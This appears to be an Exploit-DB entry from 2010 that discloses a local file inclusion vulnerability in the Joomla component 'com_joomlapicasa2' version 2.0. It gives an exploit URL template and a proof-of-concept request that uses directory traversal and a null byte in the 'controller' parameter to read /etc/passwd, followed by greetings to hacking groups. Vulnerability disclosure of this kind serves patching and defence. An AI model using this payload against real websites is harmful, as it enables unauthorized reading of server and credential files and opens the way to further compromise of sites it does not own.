Joomla! Component Picasa 2.0 - Local File Inclusion

EDB-ID:

12058


Author:

Vrs-hCk

Type:

webapps


Platform:

PHP

Date:

2010-04-04


# Exploit Title: Joomla Component Picasa 2.0 LFI Vulnerability
# Date: Monday, 05 April 2010
# Author: Vrs-hCk
# Software Link: http://prof3ta.netsons.org/
# Version: Joomla Component Picasa version 2.0
# Tested on:
# CVE :
# Code :

 ================================================================================================

 Title    : Joomla Component Picasa 2.0 LFI Vulnerability
 Software : com_joomlapicasa2 version 2.0
 Vendor   : http://prof3ta.netsons.org/

 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [+] Exploit

     http://[site]/[path]/index.php?option=com_joomlapicasa2&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00

 ================================================================================================

 Greetz   :

     www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
     Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
     wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.

 ================================================================================================

# c0li.m0de.0n